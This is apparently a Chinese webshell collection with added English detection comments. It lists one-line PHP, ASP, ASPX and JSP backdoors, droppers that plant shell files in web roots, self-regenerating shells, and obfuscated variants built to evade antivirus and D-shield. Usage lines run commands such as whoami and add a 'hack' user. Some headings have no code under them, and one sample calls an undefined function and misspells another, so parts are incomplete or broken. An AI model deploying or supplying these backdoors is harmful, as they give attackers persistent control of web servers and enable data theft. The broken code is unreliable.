一.一句话木马
php
#phpinfo马
<?php /* Runs phpinfo() through eval() of an interpolated string. The literal "phpinfo()" is still present, so a token scanner catches this one; it is only the template for the request-fed variants below. Detection signal: eval() whose argument is anything other than a constant string literal. */ $a="phpinfo()"; eval("$a;");?>
#短的一句话木马
<?php /* Unauthenticated eval() of GET parameter w: whatever PHP arrives in the query string runs as the web-server user. Detection: eval() applied to $_GET/$_POST/$_REQUEST/$_COOKIE. eval is a language construct, not a function, so php.ini disable_functions does not block it; a webroot that the PHP user cannot write to plus file-integrity monitoring are the practical controls. */ eval($_GET[w]);
#函数一句话木马
<?php /* Callee and argument both come from the request (the usage note below shows a=system&b=whoami), so no dangerous function name is present in the file itself. Detection: call_user_func()/call_user_func_array() or a variable function call whose callee is request-derived. Mitigation: disable_functions limits which callees work (system, exec, passthru, shell_exec, popen, proc_open) but any function left enabled remains reachable this way. */ @call_user_func($_GET['a'],$_GET['b']);?>
使用方法&a=system&b=whoami
没空格的马
// eval() of POST parameter cmd with the @ operator in front, so nothing reaches the error log when a payload fails to parse. There is no open tag, so this is presumably meant to be inserted into an existing PHP file - the case file-integrity monitoring of the webroot is there to catch. Detection: the substrings "@eval(" and "eval($_", and the @ operator in front of eval/assert/system.
@eval($_POST[cmd]);
直接写马->组合拳和文件包含漏洞一起组合
<? /* Dropper using the short open tag (needs short_open_tag=On): on first request it writes shell.php into the current directory with an eval($_POST[x]) payload. The detectable event is the file write, not the payload: alert on fopen()/fputs()/file_put_contents() from web context whose target ends in .php, and on new .php files appearing in the webroot; a webroot the PHP user cannot write to stops it outright. */ fputs(fopen("shell.php","w"),"<?php eval($_POST[x]);?>")?>
可写一句话木马的写入函数
文件包含漏洞
三个类型的一句话木马
php一句话木马: <?php @eval($_POST[value]); ?>
asp一句话木马: <%eval request ("value")%> 或 <% execute(request("value")) %>
aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>
<?php /* Dropper: creates xie.php in the current directory and writes an eval($_POST[xie]) shell into it; the written payload itself uses the short open tag. Detect the write rather than the payload: fopen()/fputs() to a *.php path from web-server context, and new .php files in the webroot. Mitigation: keep the webroot non-writable by the PHP user. */ fputs( fopen('xie.php','w') , '<? php eval($_POST[xie]) ?>' ) ; ?>
在当前目录下创建xie.php文件,并将一句话木马写入该文件中
aspx常见马
aspx的xls cmd马
ashx写aspx马的
<%@ WebHandler Language="C#" Class="Handler" %>
// Dropper packaged as an ASP.NET generic handler (.ashx). Any request to it writes
// query.aspx into the web application; that file is a JScript page running
// eval(Request.Item["xiaoma"], "unsafe"), i.e. a parameter-driven code-execution
// shell with "xiaoma" as the parameter name. The handler itself only returns a
// benign-looking text body.
// Detection: File.CreateText / StreamWriter targeting context.Server.MapPath(...)
// from inside a handler, and any .aspx file created under the application at runtime.
// Mitigation: deny the application-pool identity write access to the web root and
// reject .ashx/.aspx in upload filters.
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
// Entry point: builds the page source, writes it to disk, flushes and closes the writer.
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
// Source of the dropped page. The directive delimiters are split across string
// concatenations so the handler source never contains an intact page directive.
string show="<% @Page Language=\"Jscript\"%"+"><%Response.Write(eval(Request.Item"+"[\"xiaoma\"]"+",\"unsafe\"));%>Hey web master,Have a nice day o.O? I hope so! HaHa";
// MapPath turns the relative name into a filesystem path inside the web application.
StreamWriter file1= File.CreateText(context.Server.MapPath("query.aspx"));
file1.Write(show);
file1.Flush();
file1.Close();
}
// IsReusable = false: a fresh handler instance per request.
public bool IsReusable {
get {
return false;
}
}
}
jsp木马
#无回显
<%-- Blind command execution: request parameter i is handed straight to Runtime.exec() and nothing is written back to the response ("no echo" in the heading), so the evidence is the child process spawned by the servlet container and the query string in the access log (the usage line below passes an OS command in i). Detection: Runtime.getRuntime().exec() with a request.getParameter() argument; shells or OS utilities appearing as children of the JVM process. --%>
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
#一句话
<%
// Arbitrary file write: when parameter f is present, the bytes of parameter t are written to
// application.getRealPath("\\") + f - a path under the web application root that the client
// chooses, with no validation of f. This is the dropper half of the pair.
// Detection: FileOutputStream built from getRealPath() plus request data; new files under the
// webapp directory created by the container's user.
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
使用方法
http://127.0.0.1:8080/EShop/a.jsp?i=net user hack 123 /add
有回显
<%
// Command execution with output: gated by a fixed password (parameter pwd must equal "b"),
// then parameter i goes to Runtime.exec() and the process's stdout is streamed back inside
// a <pre> block, 2048 bytes at a time.
// Detection: Runtime.exec()/getInputStream() fed by request.getParameter(); a hard-coded
// equals() check on a request parameter immediately before exec is a typical shell shape.
if("b".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
http://127.0.0.1:8080/EShop/b.jsp?pwd=b&i=ipconfig
连接后i代命令即可
变种马
php的
#正则表达式马
<?php
// preg_replace() with the e modifier evaluates the replacement string as PHP after each match.
// The subject "error" consists of letters from the class [email], so a match is guaranteed and
// POST parameter h is executed; no eval/system token appears in the file.
// Detection: a regex literal whose modifiers include e passed to preg_replace, especially with
// a request-derived replacement. PHP 7.0 removed the e modifier, so on a current runtime its
// presence is a giveaway rather than a legacy idiom.
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//绕过<?限制的一句话-->绕<?
<script language="php">/* The @eval-of-POST shell wrapped in the script-tag form of the PHP open tag, which defeats scanners keyed only on the "<?" token. PHP 7.0 removed this alternative tag, so it is relevant on PHP 5 hosts only. Detection: language="php" inside a script tag, plus the usual eval($_POST pattern. */@eval($_POST[sb])</script>
#利用反引号构造一句话木马
<?php /* Shell execution via the backtick operator, which is equivalent to shell_exec(): GET parameter r is run as a shell command and its output echoed. The backtick operator is disabled whenever shell_exec is listed in disable_functions, so that directive is the mitigation. Detection: a backtick string containing a request superglobal. */ echo `$_GET['r']` ?>
#执行系统命令的木马
<?php /* system() called on request data with no indirection - the pattern signature scanners are built for: an exec-family function (system, exec, passthru, shell_exec, popen, proc_open) with a $_GET/$_POST/$_REQUEST argument. Mitigation: list those functions in disable_functions wherever the application does not need them. */ system($_REQUEST1);?>
#无特征隐藏PHP一句话:
<?php session_start();
// Two-stage, session-backed shell. Stage 1: POST parameter code is trimmed and stored in
// $_SESSION['theCode']. Stage 2: whenever the session holds code, preg_replace() with the e
// modifier (the pattern delimiter is the single quote: 'a'eis) evaluates
// eval(base64_decode($_SESSION['theCode'])); the word eval is assembled as 'e'.'v'.'a'.'l'
// so it never appears literally, which is what the "no signature" heading refers to.
// Forensics note: after the first request the payload lives in the session store, not in
// later requests, so request logs alone will not show it - inspect the session files too.
// Detection: preg_replace with an e modifier, base64_decode() on session data, and
// concatenated single-character strings forming a function name.
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); $_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
#一句话变形
<?php /* Variable function call: $_ receives GET parameter 2 (the callee name) and is then invoked on POST parameter 1 (the argument); the usage note below uses 2=assert, i.e. assert() as an eval substitute, with 1 as the password. No dangerous function name is present in the file. Detection: $var(...) calls where $var was assigned from a request superglobal; "assert" as a query-string value in request logs. Mitigation: zend.assertions=-1 (the php.ini-production setting) stops assert() from evaluating its argument, and PHP 8 no longer evaluates string arguments to assert() at all. */ ($_=@$_GET[2]).@$_($_POST[1])?>
在菜刀里写 http://site/1.php?2=assert ,密码是1
#绕字符的一句话木马变形
<?php /* Letter-free shell. The first segment derives $_ purely from string/array coercion and the | and ^ operators on empty-string offsets, so no identifier characters appear; per the usage note below, ${'_'.$_} then resolves to a request superglobal whose entry _ is the callee (assert) and entry __ the argument (an eval of POST pass). Detection: variable-variables of the form ${'_'.$x}, $_[+""] offsets, and bitwise |/^ applied to string literals - none of which occur in ordinary application code. */ $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> <?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass'])
密码是pass。
<?php /* Byte-flip obfuscation: a function name ($____) and a superglobal name ($_____, seeded with '_') are assembled one byte at a time as ~ (bitwise NOT) of single bytes taken from multibyte string literals via the curly-brace offset syntax $str{$i}. $__ is 2 (true+true) and $_ is 1; they serve as the byte offsets and $__ doubles as the request index (the note below says the password is 2). $_=$$_____ is a variable-variable dereference of the assembled superglobal and $____($_[$__]) the call. Detection: ~ applied to string offsets, $$ variable-variables, and runs of underscore-only variable names. Curly-brace string offsets were removed in PHP 8.0, so this variant cannot run there. */ $__=('>'>'<')+('>'>'<'); $_=$__/$__; $____=''; $___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__}); $_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_}); $_=$$_____; $____($_[$__]);
密码是2
ASSERT($_POST[_])(无需获取小写a):
<?php /* String-increment obfuscation, spelled out by its own trailing comments: "$_" of an empty array yields "Array", its first character "A" (index false == 0) is the seed, and repeated $__++ walks the alphabet to build the callee ASSERT and the superglobal name _POST; $_=$$____ dereferences $_POST and $___($_[_]) is ASSERT($_POST[_]). The only string literals are "$_", '!', '@' and '_', so no function or superglobal name is visible to a token scanner. Detection: long runs of $var++ applied to a string, $$ variable-variables, and array-to-"Array" coercion (@"$_" on an array). */ $_=[]; $_=@"$_"; // $_='Array'; $_=$_['!'=='@']; // $_=$_[0]; $___=$_; // A $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; $___.=$__; // S $___.=$__; // S $__=$_; $__++;$__++;$__++;$__++; // E $___.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R $___.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T $___.=$__; $____='_'; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T $____.=$__; $_=$$____; $___($_[_]); // ASSERT($_POST[_]);
密码是下划线
#变形3
// preg_replace e-modifier variant with the function name hidden behind str_rot13('riny') (= eval):
// the replacement becomes "@eval($b4dboy)" and is evaluated once /ad/ matches the subject 'add',
// executing POST parameter b4dboy. The assignment inside (...) && short-circuits when the parameter
// is absent, so an ordinary request produces no error. Detection: preg_replace with an e modifier;
// str_rot13() of a short literal; request data assigned inside a && condition.
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
#包含马
// File-inclusion shell: GET parameter xbid is passed to include() unvalidated, so the client
// chooses which local file (or, with allow_url_include=On, which remote URL) is parsed as PHP.
// Mitigation: keep allow_url_include=Off, resolve includes against an allow-list or a fixed base
// directory, never build include paths from request data. Detection: include/require whose
// operand traces back to a request superglobal.
$filename=$_GET['xbid']; include ($filename);
#骚姿势马
①循环生成马
<?php set_time_limit(0);
// Regenerating dropper: the script deletes itself (unlink(__FILE__)) and then loops forever
// rewriting path/webshell.php with an eval($_POST["password"]) payload. set_time_limit(0) and
// ignore_user_abort(1) keep the loop alive after the request that started it is closed, so the
// payload reappears as fast as it is removed.
// Response note: deleting webshell.php is useless while the worker running this loop is alive;
// restart the PHP worker pool / web server processes first, then remove the file.
// Detection: a PHP worker that stays busy long after its request ended, and repeated writes to
// the same .php path.
ignore_user_abort(1);
unlink(__FILE__); //file_put_contents(__FILE__,'');
while(1){
file_put_contents('path/webshell.php','<?php @eval($_POST["password"]);?>'); }
?>
②不死包含马
<?php
// Self-replicating variant: endlessly copies its own source to a randomly named .php file and then
// requests http://127.0.0.1/, presumably to keep a second worker busy as well. set_time_limit(0) and
// ignore_user_abort(true) keep the loop running after the client disconnects.
// Response note: removing the copies while the worker is alive is futile - restart the PHP workers
// first, then clean up. Detection: a burst of new .php files with random names, a PHP worker that
// never finishes, and repeated requests from 127.0.0.1 in the access log.
set_time_limit(0);
ignore_user_abort(true);
while(1){
file_put_contents(randstr().'.php',file_get_content(__FILE__));
file_get_contents("http://127.0.0.1/");
}
?>
大马
jsp大马
jsp马可用
jsp上传马操控的 上传马好像就这个比较优秀
二 免杀webshell
php免杀webshell
asp免杀webshell
大马集合
小马生成思路
绕过学习
写上传马的思路
过d盾马思路学习
①aspx的
<%@ Page Language="Jscript"%>
<%
// Obfuscated JScript.NET eval shell. a is the string "unsafe" assembled from Char() codes and b
// spells Request.Item["M"] the same way, so neither literal appears in the page source. eval(b, a)
// in "unsafe" mode evaluates b and yields the content of request parameter M; eval(M, a) then
// executes that content. Response.Write("Test") is the decoy output.
// Detection: eval with a second argument of "unsafe" (or a variable that resolves to it), and
// Char(...)/fromCharCode chains that build identifiers or the word "unsafe".
var a = "un" + Char ( 115 ) + Char ( 97 ) + "fe";
var b = Char ( 82 ) + Char ( 101 ) + Char ( 113 ) + Char ( 117 ) + Char ( 101 ) + Char ( 115 ) + Char ( 116 ) + Char ( 46 ) + Char ( 73 ) + Char ( 116 ) + Char ( 101 ) + Char ( 109 ) + Char ( 91 ) + Char ( 34 ) + Char ( 77 ) + Char ( 34 ) + Char ( 93 );
var M = eval(b,a);
var T = eval(M,a);
Response.Write("Test");
%>
②
<%@ Page Language="Jscript"%>
<%
// Split-and-rejoin eval shell: the whole payload arrives in request parameter M, is cut into its
// first character and the remainder, and rejoined inside eval(a+b, c) with c == "unsafe" (built
// from Char() codes). The split presumably exists so that eval's argument never sits in a single
// string a scanner could match. Detection: eval() whose argument is a concatenation of
// Request.Item / substring() pieces, and the Char()-assembled "unsafe" literal.
var p = Request.Item["M"];
var a = p.substring(0,1);
var b = p.substring(1,99999);
var c = "un" + Char ( 115 ) + Char ( 97 ) + "fe";
eval(a+b,c);
%>
③
<script runat="server" language="JScript">
// Server-side helper: evaluates str in "unsafe" mode; the mode string is assembled as
// "u" + "ns" + "afe" so the literal "unsafe" never appears.
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<%
// The base64 literal decodes to Request.Item["z"] (the "password z" note below): the inner
// popup() call evaluates that expression to fetch parameter z, the outer popup() executes
// its content. Detection: Convert.FromBase64String feeding eval; eval with an "unsafe"
// second argument; a runat="server" script block whose only purpose is to wrap eval.
popup(popup(System.Text.Encoding.GetEncoding(65001).
GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
%>
#密码z
asp的
①
<%
' Classic ASP shell: the payload arrives in request parameter pass, is split with mid() into
' its first character (A) and the rest (B), and rejoined in eval A&B so that "eval request("
' never appears as one token. Detection: eval/execute/executeglobal whose operand is built by
' concatenating request() pieces; mid()/split() on request data immediately before eval.
P=request("pass")
A=mid(P,1,1)
B=mid(P,2,9999)
eval A&B
%>